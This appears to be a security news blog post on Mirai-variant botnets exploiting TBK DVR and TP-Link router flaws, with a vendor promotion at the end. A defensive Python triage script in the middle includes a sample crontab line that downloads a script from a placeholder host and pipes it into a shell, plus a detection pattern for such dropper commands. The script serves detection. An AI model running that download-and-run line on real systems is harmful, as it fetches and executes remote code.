CVE-2024-3721 Exploited by Mirai Variant Nexcorium to Hijack TBK DVRs for DDoS Botnet

1294 words · 18 min read
Daksh
Apr 22, 2026
CVE

Findings: Fortinet FortiGuard Labs and Palo Alto Networks Unit 42

Threat actors are exploiting security holes in TBK DVRs and end-of-life (EoL) TP-Link Wi-Fi routers to deploy Mirai botnet variants on the compromised devices.

CVE-2024-3721 (CVSS score: 6.3), a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recorders, is reportedly being exploited in attacks on TBK DVR devices to distribute a Mirai variant known as Nexcorium.

Vincent Li, Security Researcher

"Due to their extensive use, lack of updating, and frequently inadequate security settings, IoT devices are becoming more and more popular targets for large-scale assaults."

"To obtain initial access and install malware that can endure, propagate, and result in distributed denial-of-service (DDoS) assaults, threat actors continue to take advantage of known vulnerabilities."


The vulnerability has previously been exploited in the wild: over the past year it has been used to deliver both RondoDox, a relatively new botnet, and a Mirai derivative.

In September 2025, CloudSEK also revealed a large-scale loader-as-a-service botnet that had been disseminating RondoDox, Mirai, and Morte payloads by abusing weak credentials and outdated vulnerabilities in routers, IoT devices, and enterprise applications.

According to Fortinet, the attack activity uses CVE-2024-3721 to retrieve and drop a downloader script, which then launches the botnet payload matching the architecture of the Linux system. Once it has finished running, the malware prints the string "nexuscorp has taken control".

Security Vendor

"Nexcorium's architecture, which includes a watchdog module, DDoS attack module, and XOR-encoded configuration table initialization, is comparable to that of the Mirai variation."


The malware also carries a list of hard-coded usernames and passwords used for brute-force attacks against other hosts over Telnet, as well as an exploit for CVE-2017-17215 targeting Huawei HG532 devices on the network.

If the Telnet login succeeds, it attempts to obtain a shell, sets up persistence using a systemd service and crontab, and connects to an external server to await commands to launch DDoS attacks over UDP, TCP, and SMTP.

Once persistence has been established on the device, the malware deletes the original downloaded binary to evade detection.
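The persistence and self-deletion behaviour described above leaves host-side traces that a defender can check for. The following Python triage script is an added example, not code from the original article or from Fortinet; it flags crontab entries and systemd units that execute from volatile directories or embed a download-and-run pattern, and lists processes whose backing executable has been deleted (Linux reports this by appending " (deleted)" to the /proc/<pid>/exe link target). The sample crontab, unit files and exe-link mapping are constructed for the demonstration, and the heuristic patterns are assumptions, not indicators published for Nexcorium.

```python
"""Host-side triage for IoT-botnet style persistence on a Linux device.

Constructed sample inputs are embedded so the checks run offline; on a live
host, feed in the real crontab text, unit file contents and /proc exe links.
"""
import os
import re

# Directories from which a long-lived service binary is rarely legitimately run.
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/shm/")

# Assumed heuristic: inline downloader, download piped into a shell, or chmod
# making something executable from a scheduled task / service definition.
SUSPICIOUS_CMD = re.compile(
    r"(?:^|[\s;&|])(?:wget|curl|tftp)\s|"
    r"\|\s*(?:sh|bash)\b|"
    r"chmod\s+(?:\+x|[0-7]*7[0-7]*)\s"
)


def command_is_suspicious(cmd: str) -> bool:
    """True if the command runs from a volatile directory or looks like a dropper."""
    return any(d in cmd for d in VOLATILE_DIRS) or bool(SUSPICIOUS_CMD.search(cmd))


def suspicious_cron_lines(crontab_text: str) -> list:
    """Return crontab lines whose command part trips the heuristic."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if s.startswith("@"):
            parts = s.split(None, 1)   # @reboot <command>
        else:
            parts = s.split(None, 5)   # m h dom mon dow <command>
        cmd = parts[-1] if len(parts) in (2, 6) else s
        if command_is_suspicious(cmd):
            hits.append(line)
    return hits


def suspicious_units(units: dict) -> list:
    """units maps unit file name -> contents; return names whose Exec*= lines trip the heuristic."""
    flagged = []
    for name, body in units.items():
        for line in body.splitlines():
            key, _, value = line.partition("=")
            if key.strip().startswith("Exec") and command_is_suspicious(value.strip()):
                flagged.append(name)
                break
    return flagged


def deleted_exe_processes(exe_links: dict) -> list:
    """exe_links maps pid -> readlink('/proc/<pid>/exe') result.

    The kernel appends ' (deleted)' when the file backing a running process is
    gone, which is exactly what a self-deleting dropper leaves behind.
    """
    return sorted(pid for pid, target in exe_links.items() if target.endswith(" (deleted)"))


def collect_live_exe_links() -> dict:
    """Read /proc on a real Linux host (returns {} where /proc is unavailable)."""
    links = {}
    if not os.path.isdir("/proc"):
        return links
    for pid in os.listdir("/proc"):
        if pid.isdigit():
            try:
                links[int(pid)] = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                continue   # process exited or permission denied
    return links


# Constructed sample data (not taken from any real infection).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /tmp/.x/svc
*/5 * * * * wget -q http://192.0.2.10/s.sh -O - | sh
"""
SAMPLE_UNITS = {
    "sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "watchdog.service": "[Service]\nExecStart=/dev/shm/.w/wd\nRestart=always\n",
}
SAMPLE_EXE_LINKS = {1: "/sbin/init", 4242: "/tmp/.x/svc (deleted)"}

if __name__ == "__main__":
    print("suspicious cron:", suspicious_cron_lines(SAMPLE_CRONTAB))
    print("suspicious units:", suspicious_units(SAMPLE_UNITS))
    print("deleted-exe pids (sample):", deleted_exe_processes(SAMPLE_EXE_LINKS))
    print("deleted-exe pids (this host):", deleted_exe_processes(collect_live_exe_links()))
```

The checks are deliberately simple string heuristics so they run on the BusyBox-class Python builds found on some embedded devices; a hit is a triage lead, not a verdict, and a process whose executable was deleted by a legitimate package upgrade will also show up until it is restarted.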

Fortinet

"To maintain long-term access to compromised computers, the Nexcorium virus combines vulnerability exploitation, support for diverse architectures, and a variety of persistence techniques. These characteristics are typical of contemporary IoT-focused botnets."

"Its broad brute-force capabilities and utilization of known exploits, such as CVE-2017-17215, highlight its versatility and effectiveness in expanding its infection reach."

The development coincides with Unit 42's disclosure that it observed active, automated scans and probes attempting to exploit CVE-2023-33538 (CVSS score: 8.8), a command injection vulnerability affecting EoL TP-Link wireless routers, albeit with a flawed approach that does not lead to a successful compromise.

Notably, in June 2025, the security vulnerability was included in the Known Exploited Vulnerabilities (KEV) list maintained by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

The vulnerability affects the following models:

    TL-WR940N v2 and v4
    TL-WR740N v1 and v2
    TL-WR841N v8 and v10

Asher Davila, Malav Vyas, and Chris Navarrete, Researchers

"Our investigation verifies the existence of the underlying vulnerability even if the in-the-wild assaults we saw were faulty and would not succeed."

"Authentication to the router's web interface is necessary for successful exploitation."

In this instance, the attacks aim to install Mirai-like botnet malware whose source code contains multiple references to the string "Condi." It can also update itself to a newer version and act as a web server to spread the infection to other connected devices.

Because these devices are no longer actively maintained, users are encouraged to replace the affected TP-Link models with newer hardware and to make sure that default credentials are not in use.

Unit 42

"The ongoing danger of default credentials in IoT devices will continue to influence the security environment for some time to come."

"For dedicated attackers, these credentials have the potential to transform a restricted, authenticated vulnerability into a crucial access point."

Conclusion

Now that we have covered how CVE-2024-3721 is being exploited by the Mirai variant Nexcorium to hijack TBK DVRs for a DDoS botnet, you may want to protect your working environment from unknown cybersecurity threats.

For that, you can get in contact with Craw Security, which offers a dedicated threat detection tool, "ThreatFusionAI." The tool uses the latest detection features to identify AI-based cyberattacks and malicious attempts.

With it in place, organizations no longer need to work through multiple separate processes to locate vulnerabilities and suspicious activity. What are you waiting for? Contact us now.

Read More:

What is CVE (Common Vulnerabilities and Exposures)?
